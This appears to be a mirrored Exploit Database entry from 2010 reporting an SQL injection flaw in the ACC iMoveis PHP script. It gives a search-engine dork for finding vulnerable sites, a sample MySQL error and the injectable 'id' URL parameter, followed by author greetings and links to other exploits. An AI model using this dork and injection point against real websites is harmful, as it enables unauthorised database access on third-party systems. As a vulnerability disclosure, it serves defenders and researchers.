ACC IMoveis 4.0 – SQL Injection

Exploit Database
86 阅读

作者： EraGoN

日期： 2010-10-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15338/

# Exploit Title : iMoveis SQL Injection Vulnerability
# Date : 26/10/2010
# Author : EraGoN
# Software link : http://baixar7.com/download/acc-imoveis-script-php.rar/3d1e7bf4b9
# Version : 1.1
# Tested on : Linux / Windows XP


# Dork :

inurl:imoveis.php?id=

#Error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server

version for the right syntax to use near '20'' at line 1

#Vuln :

http://www.site.org/imoveis.php?id=20


**Proud to be Muslim
**Proud to be Albanian
**www.eragon.ws

Contact : eragon@legends.ag


[ Special Thanks : KuBaNeZi , DJ-DUKLI , The|Denny` , Loock3D , BaDBoY ]
[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ]

last Exploits
ACC IMoveis 4.0 – SQL Injection的更多信息

Joomla! Component Google Map Landkarten 4.2.3 – SQL Injection：
Advanced Guestbook – ‘addentry.php’ Arbitrary File Upload：
Frog CMS 0.9.5 – Multiple Vulnerabilities：
WordPress Plugin Zingiri Forums – ‘language’ Local File Inclusion：
WordPress Plugin Adning Advertising 1.5.5 – Arbitrary File Upload：
gridcc script 1.0 – SQL Injection / Cross-Site Scripting：
Cornerstone CMS – SQL Injection：
MeiuPic 2.1.2 – ‘ctl’ Local File Inclusion：